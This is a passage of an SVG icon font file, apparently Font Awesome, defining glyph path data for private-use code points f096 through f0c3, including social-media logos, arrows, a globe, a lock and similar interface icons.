<glyph unicode="&#xf096;" horiz-adv-x="1408" d="M1120 1280h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v832q0 66 -47 113t-113 47zM1408 1120v-832q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832 q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf097;" horiz-adv-x="1280" d="M1152 1280h-1024v-1242l423 406l89 85l89 -85l423 -406v1242zM1164 1408q23 0 44 -9q33 -13 52.5 -41t19.5 -62v-1289q0 -34 -19.5 -62t-52.5 -41q-19 -8 -44 -8q-48 0 -83 32l-441 424l-441 -424q-36 -33 -83 -33q-23 0 -44 9q-33 13 -52.5 41t-19.5 62v1289 q0 34 19.5 62t52.5 41q21 9 44 9h1048z" />
<glyph unicode="&#xf098;" d="M1280 343q0 11 -2 16q-3 8 -38.5 29.5t-88.5 49.5l-53 29q-5 3 -19 13t-25 15t-21 5q-18 0 -47 -32.5t-57 -65.5t-44 -33q-7 0 -16.5 3.5t-15.5 6.5t-17 9.5t-14 8.5q-99 55 -170.5 126.5t-126.5 170.5q-2 3 -8.5 14t-9.5 17t-6.5 15.5t-3.5 16.5q0 13 20.5 33.5t45 38.5 t45 39.5t20.5 36.5q0 10 -5 21t-15 25t-13 19q-3 6 -15 28.5t-25 45.5t-26.5 47.5t-25 40.5t-16.5 18t-16 2q-48 0 -101 -22q-46 -21 -80 -94.5t-34 -130.5q0 -16 2.5 -34t5 -30.5t9 -33t10 -29.5t12.5 -33t11 -30q60 -164 216.5 -320.5t320.5 -216.5q6 -2 30 -11t33 -12.5 t29.5 -10t33 -9t30.5 -5t34 -2.5q57 0 130.5 34t94.5 80q22 53 22 101zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf099;" horiz-adv-x="1664" d="M1620 1128q-67 -98 -162 -167q1 -14 1 -42q0 -130 -38 -259.5t-115.5 -248.5t-184.5 -210.5t-258 -146t-323 -54.5q-271 0 -496 145q35 -4 78 -4q225 0 401 138q-105 2 -188 64.5t-114 159.5q33 -5 61 -5q43 0 85 11q-112 23 -185.5 111.5t-73.5 205.5v4q68 -38 146 -41 q-66 44 -105 115t-39 154q0 88 44 163q121 -149 294.5 -238.5t371.5 -99.5q-8 38 -8 74q0 134 94.5 228.5t228.5 94.5q140 0 236 -102q109 21 205 78q-37 -115 -142 -178q93 10 186 50z" />
<glyph unicode="&#xf09a;" horiz-adv-x="1024" d="M959 1524v-264h-157q-86 0 -116 -36t-30 -108v-189h293l-39 -296h-254v-759h-306v759h-255v296h255v218q0 186 104 288.5t277 102.5q147 0 228 -12z" />
<glyph unicode="&#xf09b;" d="M1536 640q0 -251 -146.5 -451.5t-378.5 -277.5q-27 -5 -39.5 7t-12.5 30v211q0 97 -52 142q57 6 102.5 18t94 39t81 66.5t53 105t20.5 150.5q0 121 -79 206q37 91 -8 204q-28 9 -81 -11t-92 -44l-38 -24q-93 26 -192 26t-192 -26q-16 11 -42.5 27t-83.5 38.5t-86 13.5 q-44 -113 -7 -204q-79 -85 -79 -206q0 -85 20.5 -150t52.5 -105t80.5 -67t94 -39t102.5 -18q-40 -36 -49 -103q-21 -10 -45 -15t-57 -5t-65.5 21.5t-55.5 62.5q-19 32 -48.5 52t-49.5 24l-20 3q-21 0 -29 -4.5t-5 -11.5t9 -14t13 -12l7 -5q22 -10 43.5 -38t31.5 -51l10 -23 q13 -38 44 -61.5t67 -30t69.5 -7t55.5 3.5l23 4q0 -38 0.5 -89t0.5 -54q0 -18 -13 -30t-40 -7q-232 77 -378.5 277.5t-146.5 451.5q0 209 103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf09c;" horiz-adv-x="1664" d="M1664 960v-256q0 -26 -19 -45t-45 -19h-64q-26 0 -45 19t-19 45v256q0 106 -75 181t-181 75t-181 -75t-75 -181v-192h96q40 0 68 -28t28 -68v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h672v192q0 185 131.5 316.5t316.5 131.5 t316.5 -131.5t131.5 -316.5z" />
<glyph unicode="&#xf09d;" horiz-adv-x="1920" d="M1760 1408q66 0 113 -47t47 -113v-1216q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1600zM160 1280q-13 0 -22.5 -9.5t-9.5 -22.5v-224h1664v224q0 13 -9.5 22.5t-22.5 9.5h-1600zM1760 0q13 0 22.5 9.5t9.5 22.5v608h-1664v-608 q0 -13 9.5 -22.5t22.5 -9.5h1600zM256 128v128h256v-128h-256zM640 128v128h384v-128h-384z" />
<glyph unicode="&#xf09e;" horiz-adv-x="1408" d="M384 192q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM896 69q2 -28 -17 -48q-18 -21 -47 -21h-135q-25 0 -43 16.5t-20 41.5q-22 229 -184.5 391.5t-391.5 184.5q-25 2 -41.5 20t-16.5 43v135q0 29 21 47q17 17 43 17h5q160 -13 306 -80.5 t259 -181.5q114 -113 181.5 -259t80.5 -306zM1408 67q2 -27 -18 -47q-18 -20 -46 -20h-143q-26 0 -44.5 17.5t-19.5 42.5q-12 215 -101 408.5t-231.5 336t-336 231.5t-408.5 102q-25 1 -42.5 19.5t-17.5 43.5v143q0 28 20 46q18 18 44 18h3q262 -13 501.5 -120t425.5 -294 q187 -186 294 -425.5t120 -501.5z" />
<glyph unicode="&#xf0a0;" d="M1040 320q0 -33 -23.5 -56.5t-56.5 -23.5t-56.5 23.5t-23.5 56.5t23.5 56.5t56.5 23.5t56.5 -23.5t23.5 -56.5zM1296 320q0 -33 -23.5 -56.5t-56.5 -23.5t-56.5 23.5t-23.5 56.5t23.5 56.5t56.5 23.5t56.5 -23.5t23.5 -56.5zM1408 160v320q0 13 -9.5 22.5t-22.5 9.5 h-1216q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h1216q13 0 22.5 9.5t9.5 22.5zM178 640h1180l-157 482q-4 13 -16 21.5t-26 8.5h-782q-14 0 -26 -8.5t-16 -21.5zM1536 480v-320q0 -66 -47 -113t-113 -47h-1216q-66 0 -113 47t-47 113v320q0 25 16 75 l197 606q17 53 63 86t101 33h782q55 0 101 -33t63 -86l197 -606q16 -50 16 -75z" />
<glyph unicode="&#xf0a1;" horiz-adv-x="1792" d="M1664 896q53 0 90.5 -37.5t37.5 -90.5t-37.5 -90.5t-90.5 -37.5v-384q0 -52 -38 -90t-90 -38q-417 347 -812 380q-58 -19 -91 -66t-31 -100.5t40 -92.5q-20 -33 -23 -65.5t6 -58t33.5 -55t48 -50t61.5 -50.5q-29 -58 -111.5 -83t-168.5 -11.5t-132 55.5q-7 23 -29.5 87.5 t-32 94.5t-23 89t-15 101t3.5 98.5t22 110.5h-122q-66 0 -113 47t-47 113v192q0 66 47 113t113 47h480q435 0 896 384q52 0 90 -38t38 -90v-384zM1536 292v954q-394 -302 -768 -343v-270q377 -42 768 -341z" />
<glyph unicode="&#xf0a2;" horiz-adv-x="1792" d="M912 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM246 128h1300q-266 300 -266 832q0 51 -24 105t-69 103t-121.5 80.5t-169.5 31.5t-169.5 -31.5t-121.5 -80.5t-69 -103t-24 -105q0 -532 -266 -832z M1728 128q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-181 75t-75 181h-448q-52 0 -90 38t-38 90q50 42 91 88t85 119.5t74.5 158.5t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q190 -28 307 -158.5 t117 -282.5q0 -139 19.5 -260t50 -206t74.5 -158.5t85 -119.5t91 -88z" />
<glyph unicode="&#xf0a3;" d="M1376 640l138 -135q30 -28 20 -70q-12 -41 -52 -51l-188 -48l53 -186q12 -41 -19 -70q-29 -31 -70 -19l-186 53l-48 -188q-10 -40 -51 -52q-12 -2 -19 -2q-31 0 -51 22l-135 138l-135 -138q-28 -30 -70 -20q-41 11 -51 52l-48 188l-186 -53q-41 -12 -70 19q-31 29 -19 70 l53 186l-188 48q-40 10 -52 51q-10 42 20 70l138 135l-138 135q-30 28 -20 70q12 41 52 51l188 48l-53 186q-12 41 19 70q29 31 70 19l186 -53l48 188q10 41 51 51q41 12 70 -19l135 -139l135 139q29 30 70 19q41 -10 51 -51l48 -188l186 53q41 12 70 -19q31 -29 19 -70 l-53 -186l188 -48q40 -10 52 -51q10 -42 -20 -70z" />
<glyph unicode="&#xf0a4;" horiz-adv-x="1792" d="M256 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 768q0 51 -39 89.5t-89 38.5h-576q0 20 15 48.5t33 55t33 68t15 84.5q0 67 -44.5 97.5t-115.5 30.5q-24 0 -90 -139q-24 -44 -37 -65q-40 -64 -112 -145q-71 -81 -101 -106 q-69 -57 -140 -57h-32v-640h32q72 0 167 -32t193.5 -64t179.5 -32q189 0 189 167q0 26 -5 56q30 16 47.5 52.5t17.5 73.5t-18 69q53 50 53 119q0 25 -10 55.5t-25 47.5h331q52 0 90 38t38 90zM1792 769q0 -105 -75.5 -181t-180.5 -76h-169q-4 -62 -37 -119q3 -21 3 -43 q0 -101 -60 -178q1 -139 -85 -219.5t-227 -80.5q-133 0 -322 69q-164 59 -223 59h-288q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5h288q10 0 21.5 4.5t23.5 14t22.5 18t24 22.5t20.5 21.5t19 21.5t14 17q65 74 100 129q13 21 33 62t37 72t40.5 63t55 49.5 t69.5 17.5q125 0 206.5 -67t81.5 -189q0 -68 -22 -128h374q104 0 180 -76t76 -179z" />
<glyph unicode="&#xf0a5;" horiz-adv-x="1792" d="M1376 128h32v640h-32q-35 0 -67.5 12t-62.5 37t-50 46t-49 54q-2 3 -3.5 4.5t-4 4.5t-4.5 5q-72 81 -112 145q-14 22 -38 68q-1 3 -10.5 22.5t-18.5 36t-20 35.5t-21.5 30.5t-18.5 11.5q-71 0 -115.5 -30.5t-44.5 -97.5q0 -43 15 -84.5t33 -68t33 -55t15 -48.5h-576 q-50 0 -89 -38.5t-39 -89.5q0 -52 38 -90t90 -38h331q-15 -17 -25 -47.5t-10 -55.5q0 -69 53 -119q-18 -32 -18 -69t17.5 -73.5t47.5 -52.5q-4 -24 -4 -56q0 -85 48.5 -126t135.5 -41q84 0 183 32t194 64t167 32zM1664 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45 t45 -19t45 19t19 45zM1792 768v-640q0 -53 -37.5 -90.5t-90.5 -37.5h-288q-59 0 -223 -59q-190 -69 -317 -69q-142 0 -230 77.5t-87 217.5l1 5q-61 76 -61 178q0 22 3 43q-33 57 -37 119h-169q-105 0 -180.5 76t-75.5 181q0 103 76 179t180 76h374q-22 60 -22 128 q0 122 81.5 189t206.5 67q38 0 69.5 -17.5t55 -49.5t40.5 -63t37 -72t33 -62q35 -55 100 -129q2 -3 14 -17t19 -21.5t20.5 -21.5t24 -22.5t22.5 -18t23.5 -14t21.5 -4.5h288q53 0 90.5 -37.5t37.5 -90.5z" />
<glyph unicode="&#xf0a6;" d="M1280 -64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 700q0 189 -167 189q-26 0 -56 -5q-16 30 -52.5 47.5t-73.5 17.5t-69 -18q-50 53 -119 53q-25 0 -55.5 -10t-47.5 -25v331q0 52 -38 90t-90 38q-51 0 -89.5 -39t-38.5 -89v-576 q-20 0 -48.5 15t-55 33t-68 33t-84.5 15q-67 0 -97.5 -44.5t-30.5 -115.5q0 -24 139 -90q44 -24 65 -37q64 -40 145 -112q81 -71 106 -101q57 -69 57 -140v-32h640v32q0 72 32 167t64 193.5t32 179.5zM1536 705q0 -133 -69 -322q-59 -164 -59 -223v-288q0 -53 -37.5 -90.5 t-90.5 -37.5h-640q-53 0 -90.5 37.5t-37.5 90.5v288q0 10 -4.5 21.5t-14 23.5t-18 22.5t-22.5 24t-21.5 20.5t-21.5 19t-17 14q-74 65 -129 100q-21 13 -62 33t-72 37t-63 40.5t-49.5 55t-17.5 69.5q0 125 67 206.5t189 81.5q68 0 128 -22v374q0 104 76 180t179 76 q105 0 181 -75.5t76 -180.5v-169q62 -4 119 -37q21 3 43 3q101 0 178 -60q139 1 219.5 -85t80.5 -227z" />
<glyph unicode="&#xf0a7;" d="M1408 576q0 84 -32 183t-64 194t-32 167v32h-640v-32q0 -35 -12 -67.5t-37 -62.5t-46 -50t-54 -49q-9 -8 -14 -12q-81 -72 -145 -112q-22 -14 -68 -38q-3 -1 -22.5 -10.5t-36 -18.5t-35.5 -20t-30.5 -21.5t-11.5 -18.5q0 -71 30.5 -115.5t97.5 -44.5q43 0 84.5 15t68 33 t55 33t48.5 15v-576q0 -50 38.5 -89t89.5 -39q52 0 90 38t38 90v331q46 -35 103 -35q69 0 119 53q32 -18 69 -18t73.5 17.5t52.5 47.5q24 -4 56 -4q85 0 126 48.5t41 135.5zM1280 1344q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 580 q0 -142 -77.5 -230t-217.5 -87l-5 1q-76 -61 -178 -61q-22 0 -43 3q-54 -30 -119 -37v-169q0 -105 -76 -180.5t-181 -75.5q-103 0 -179 76t-76 180v374q-54 -22 -128 -22q-121 0 -188.5 81.5t-67.5 206.5q0 38 17.5 69.5t49.5 55t63 40.5t72 37t62 33q55 35 129 100 q3 2 17 14t21.5 19t21.5 20.5t22.5 24t18 22.5t14 23.5t4.5 21.5v288q0 53 37.5 90.5t90.5 37.5h640q53 0 90.5 -37.5t37.5 -90.5v-288q0 -59 59 -223q69 -190 69 -317z" />
<glyph unicode="&#xf0a8;" d="M1280 576v128q0 26 -19 45t-45 19h-502l189 189q19 19 19 45t-19 45l-91 91q-18 18 -45 18t-45 -18l-362 -362l-91 -91q-18 -18 -18 -45t18 -45l91 -91l362 -362q18 -18 45 -18t45 18l91 91q18 18 18 45t-18 45l-189 189h502q26 0 45 19t19 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf0a9;" d="M1285 640q0 27 -18 45l-91 91l-362 362q-18 18 -45 18t-45 -18l-91 -91q-18 -18 -18 -45t18 -45l189 -189h-502q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h502l-189 -189q-19 -19 -19 -45t19 -45l91 -91q18 -18 45 -18t45 18l362 362l91 91q18 18 18 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf0aa;" d="M1284 641q0 27 -18 45l-362 362l-91 91q-18 18 -45 18t-45 -18l-91 -91l-362 -362q-18 -18 -18 -45t18 -45l91 -91q18 -18 45 -18t45 18l189 189v-502q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v502l189 -189q19 -19 45 -19t45 19l91 91q18 18 18 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf0ab;" d="M1284 639q0 27 -18 45l-91 91q-18 18 -45 18t-45 -18l-189 -189v502q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-502l-189 189q-19 19 -45 19t-45 -19l-91 -91q-18 -18 -18 -45t18 -45l362 -362l91 -91q18 -18 45 -18t45 18l91 91l362 362q18 18 18 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf0ac;" d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM1042 887q-2 -1 -9.5 -9.5t-13.5 -9.5q2 0 4.5 5t5 11t3.5 7q6 7 22 15q14 6 52 12q34 8 51 -11 q-2 2 9.5 13t14.5 12q3 2 15 4.5t15 7.5l2 22q-12 -1 -17.5 7t-6.5 21q0 -2 -6 -8q0 7 -4.5 8t-11.5 -1t-9 -1q-10 3 -15 7.5t-8 16.5t-4 15q-2 5 -9.5 10.5t-9.5 10.5q-1 2 -2.5 5.5t-3 6.5t-4 5.5t-5.5 2.5t-7 -5t-7.5 -10t-4.5 -5q-3 2 -6 1.5t-4.5 -1t-4.5 -3t-5 -3.5 q-3 -2 -8.5 -3t-8.5 -2q15 5 -1 11q-10 4 -16 3q9 4 7.5 12t-8.5 14h5q-1 4 -8.5 8.5t-17.5 8.5t-13 6q-8 5 -34 9.5t-33 0.5q-5 -6 -4.5 -10.5t4 -14t3.5 -12.5q1 -6 -5.5 -13t-6.5 -12q0 -7 14 -15.5t10 -21.5q-3 -8 -16 -16t-16 -12q-5 -8 -1.5 -18.5t10.5 -16.5 q2 -2 1.5 -4t-3.5 -4.5t-5.5 -4t-6.5 -3.5l-3 -2q-11 -5 -20.5 6t-13.5 26q-7 25 -16 30q-23 8 -29 -1q-5 13 -41 26q-25 9 -58 4q6 1 0 15q-7 15 -19 12q3 6 4 17.5t1 13.5q3 13 12 23q1 1 7 8.5t9.5 13.5t0.5 6q35 -4 50 11q5 5 11.5 17t10.5 17q9 6 14 5.5t14.5 -5.5 t14.5 -5q14 -1 15.5 11t-7.5 20q12 -1 3 17q-5 7 -8 9q-12 4 -27 -5q-8 -4 2 -8q-1 1 -9.5 -10.5t-16.5 -17.5t-16 5q-1 1 -5.5 13.5t-9.5 13.5q-8 0 -16 -15q3 8 -11 15t-24 8q19 12 -8 27q-7 4 -20.5 5t-19.5 -4q-5 -7 -5.5 -11.5t5 -8t10.5 -5.5t11.5 -4t8.5 -3 q14 -10 8 -14q-2 -1 -8.5 -3.5t-11.5 -4.5t-6 -4q-3 -4 0 -14t-2 -14q-5 5 -9 17.5t-7 16.5q7 -9 -25 -6l-10 1q-4 0 -16 -2t-20.5 -1t-13.5 8q-4 8 0 20q1 4 4 2q-4 3 -11 9.5t-10 8.5q-46 -15 -94 -41q6 -1 12 1q5 2 13 6.5t10 5.5q34 14 42 7l5 5q14 -16 20 -25 q-7 4 -30 1q-20 -6 -22 -12q7 -12 5 -18q-4 3 -11.5 10t-14.5 11t-15 5q-16 0 -22 -1q-146 -80 -235 -222q7 -7 12 -8q4 -1 5 -9t2.5 -11t11.5 3q9 -8 3 -19q1 1 44 -27q19 -17 21 -21q3 -11 -10 -18q-1 2 -9 9t-9 4q-3 -5 0.5 -18.5t10.5 -12.5q-7 0 -9.5 -16t-2.5 -35.5 t-1 -23.5l2 -1q-3 -12 5.5 -34.5t21.5 -19.5q-13 -3 20 -43q6 -8 8 -9q3 -2 12 -7.5t15 -10t10 -10.5q4 -5 10 -22.5t14 -23.5q-2 -6 9.5 -20t10.5 -23q-1 0 -2.5 -1t-2.5 -1q3 -7 15.5 -14t15.5 -13q1 -3 2 -10t3 -11t8 -2q2 20 -24 62q-15 25 -17 29q-3 5 -5.5 15.5 t-4.5 14.5q2 0 6 -1.5t8.5 -3.5t7.5 -4t2 -3q-3 -7 2 -17.5t12 -18.5t17 -19t12 -13q6 -6 14 -19.5t0 -13.5q9 0 20 -10t17 -20q5 -8 8 -26t5 -24q2 -7 8.5 -13.5t12.5 -9.5l16 -8t13 -7q5 -2 18.5 -10.5t21.5 -11.5q10 -4 16 -4t14.5 2.5t13.5 3.5q15 2 29 -15t21 -21 q36 -19 55 -11q-2 -1 0.5 -7.5t8 -15.5t9 -14.5t5.5 -8.5q5 -6 18 -15t18 -15q6 4 7 9q-3 -8 7 -20t18 -10q14 3 14 32q-31 -15 -49 18q0 1 -2.5 5.5t-4 8.5t-2.5 8.5t0 7.5t5 3q9 0 10 3.5t-2 12.5t-4 13q-1 8 -11 20t-12 15q-5 -9 -16 -8t-16 9q0 -1 -1.5 -5.5t-1.5 -6.5 q-13 0 -15 1q1 3 2.5 17.5t3.5 22.5q1 4 5.5 12t7.5 14.5t4 12.5t-4.5 9.5t-17.5 2.5q-19 -1 -26 -20q-1 -3 -3 -10.5t-5 -11.5t-9 -7q-7 -3 -24 -2t-24 5q-13 8 -22.5 29t-9.5 37q0 10 2.5 26.5t3 25t-5.5 24.5q3 2 9 9.5t10 10.5q2 1 4.5 1.5t4.5 0t4 1.5t3 6q-1 1 -4 3 q-3 3 -4 3q7 -3 28.5 1.5t27.5 -1.5q15 -11 22 2q0 1 -2.5 9.5t-0.5 13.5q5 -27 29 -9q3 -3 15.5 -5t17.5 -5q3 -2 7 -5.5t5.5 -4.5t5 0.5t8.5 6.5q10 -14 12 -24q11 -40 19 -44q7 -3 11 -2t4.5 9.5t0 14t-1.5 12.5l-1 8v18l-1 8q-15 3 -18.5 12t1.5 18.5t15 18.5q1 1 8 3.5 t15.5 6.5t12.5 8q21 19 15 35q7 0 11 9q-1 0 -5 3t-7.5 5t-4.5 2q9 5 2 16q5 3 7.5 11t7.5 10q9 -12 21 -2q7 8 1 16q5 7 20.5 10.5t18.5 9.5q7 -2 8 2t1 12t3 12q4 5 15 9t13 5l17 11q3 4 0 4q18 -2 31 11q10 11 -6 20q3 6 -3 9.5t-15 5.5q3 1 11.5 0.5t10.5 1.5 q15 10 -7 16q-17 5 -43 -12zM879 10q206 36 351 189q-3 3 -12.5 4.5t-12.5 3.5q-18 7 -24 8q1 7 -2.5 13t-8 9t-12.5 8t-11 7q-2 2 -7 6t-7 5.5t-7.5 4.5t-8.5 2t-10 -1l-3 -1q-3 -1 -5.5 -2.5t-5.5 -3t-4 -3t0 -2.5q-21 17 -36 22q-5 1 -11 5.5t-10.5 7t-10 1.5t-11.5 -7 q-5 -5 -6 -15t-2 -13q-7 5 0 17.5t2 18.5q-3 6 -10.5 4.5t-12 -4.5t-11.5 -8.5t-9 -6.5t-8.5 -5.5t-8.5 -7.5q-3 -4 -6 -12t-5 -11q-2 4 -11.5 6.5t-9.5 5.5q2 -10 4 -35t5 -38q7 -31 -12 -48q-27 -25 -29 -40q-4 -22 12 -26q0 -7 -8 -20.5t-7 -21.5q0 -6 2 -16z" />
<glyph unicode="&#xf0ad;" horiz-adv-x="1664" d="M384 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1028 484l-682 -682q-37 -37 -90 -37q-52 0 -91 37l-106 108q-38 36 -38 90q0 53 38 91l681 681q39 -98 114.5 -173.5t173.5 -114.5zM1662 919q0 -39 -23 -106q-47 -134 -164.5 -217.5 t-258.5 -83.5q-185 0 -316.5 131.5t-131.5 316.5t131.5 316.5t316.5 131.5q58 0 121.5 -16.5t107.5 -46.5q16 -11 16 -28t-16 -28l-293 -169v-224l193 -107q5 3 79 48.5t135.5 81t70.5 35.5q15 0 23.5 -10t8.5 -25z" />
<glyph unicode="&#xf0ae;" horiz-adv-x="1792" d="M1024 128h640v128h-640v-128zM640 640h1024v128h-1024v-128zM1280 1152h384v128h-384v-128zM1792 320v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 832v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19 t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 1344v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0b0;" horiz-adv-x="1408" d="M1403 1241q17 -41 -14 -70l-493 -493v-742q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-256 256q-19 19 -19 45v486l-493 493q-31 29 -14 70q17 39 59 39h1280q42 0 59 -39z" />
<glyph unicode="&#xf0b1;" horiz-adv-x="1792" d="M640 1280h512v128h-512v-128zM1792 640v-480q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v480h672v-160q0 -26 19 -45t45 -19h320q26 0 45 19t19 45v160h672zM1024 640v-128h-256v128h256zM1792 1120v-384h-1792v384q0 66 47 113t113 47h352v160q0 40 28 68 t68 28h576q40 0 68 -28t28 -68v-160h352q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf0b2;" d="M1283 995l-355 -355l355 -355l144 144q29 31 70 14q39 -17 39 -59v-448q0 -26 -19 -45t-45 -19h-448q-42 0 -59 40q-17 39 14 69l144 144l-355 355l-355 -355l144 -144q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l144 -144 l355 355l-355 355l-144 -144q-19 -19 -45 -19q-12 0 -24 5q-40 17 -40 59v448q0 26 19 45t45 19h448q42 0 59 -40q17 -39 -14 -69l-144 -144l355 -355l355 355l-144 144q-31 30 -14 69q17 40 59 40h448q26 0 45 -19t19 -45v-448q0 -42 -39 -59q-13 -5 -25 -5q-26 0 -45 19z " />
<glyph unicode="&#xf0c0;" horiz-adv-x="1920" d="M593 640q-162 -5 -265 -128h-134q-82 0 -138 40.5t-56 118.5q0 353 124 353q6 0 43.5 -21t97.5 -42.5t119 -21.5q67 0 133 23q-5 -37 -5 -66q0 -139 81 -256zM1664 3q0 -120 -73 -189.5t-194 -69.5h-874q-121 0 -194 69.5t-73 189.5q0 53 3.5 103.5t14 109t26.5 108.5 t43 97.5t62 81t85.5 53.5t111.5 20q10 0 43 -21.5t73 -48t107 -48t135 -21.5t135 21.5t107 48t73 48t43 21.5q61 0 111.5 -20t85.5 -53.5t62 -81t43 -97.5t26.5 -108.5t14 -109t3.5 -103.5zM640 1280q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75 t75 -181zM1344 896q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5zM1920 671q0 -78 -56 -118.5t-138 -40.5h-134q-103 123 -265 128q81 117 81 256q0 29 -5 66q66 -23 133 -23q59 0 119 21.5t97.5 42.5 t43.5 21q124 0 124 -353zM1792 1280q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181z" />
<glyph unicode="&#xf0c1;" horiz-adv-x="1664" d="M1456 320q0 40 -28 68l-208 208q-28 28 -68 28q-42 0 -72 -32q3 -3 19 -18.5t21.5 -21.5t15 -19t13 -25.5t3.5 -27.5q0 -40 -28 -68t-68 -28q-15 0 -27.5 3.5t-25.5 13t-19 15t-21.5 21.5t-18.5 19q-33 -31 -33 -73q0 -40 28 -68l206 -207q27 -27 68 -27q40 0 68 26 l147 146q28 28 28 67zM753 1025q0 40 -28 68l-206 207q-28 28 -68 28q-39 0 -68 -27l-147 -146q-28 -28 -28 -67q0 -40 28 -68l208 -208q27 -27 68 -27q42 0 72 31q-3 3 -19 18.5t-21.5 21.5t-15 19t-13 25.5t-3.5 27.5q0 40 28 68t68 28q15 0 27.5 -3.5t25.5 -13t19 -15 t21.5 -21.5t18.5 -19q33 31 33 73zM1648 320q0 -120 -85 -203l-147 -146q-83 -83 -203 -83q-121 0 -204 85l-206 207q-83 83 -83 203q0 123 88 209l-88 88q-86 -88 -208 -88q-120 0 -204 84l-208 208q-84 84 -84 204t85 203l147 146q83 83 203 83q121 0 204 -85l206 -207 q83 -83 83 -203q0 -123 -88 -209l88 -88q86 88 208 88q120 0 204 -84l208 -208q84 -84 84 -204z" />
<glyph unicode="&#xf0c2;" horiz-adv-x="1920" d="M1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088q-185 0 -316.5 131.5t-131.5 316.5q0 132 71 241.5t187 163.5q-2 28 -2 43q0 212 150 362t362 150q158 0 286.5 -88t187.5 -230q70 62 166 62q106 0 181 -75t75 -181q0 -75 -41 -138q129 -30 213 -134.5t84 -239.5z " />
<glyph unicode="&#xf0c3;" horiz-adv-x="1664" d="M1527 88q56 -89 21.5 -152.5t-140.5 -63.5h-1152q-106 0 -140.5 63.5t21.5 152.5l503 793v399h-64q-26 0 -45 19t-19 45t19 45t45 19h512q26 0 45 -19t19 -45t-19 -45t-45 -19h-64v-399zM748 813l-272 -429h712l-272 429l-20 31v37v399h-128v-399v-37z" />
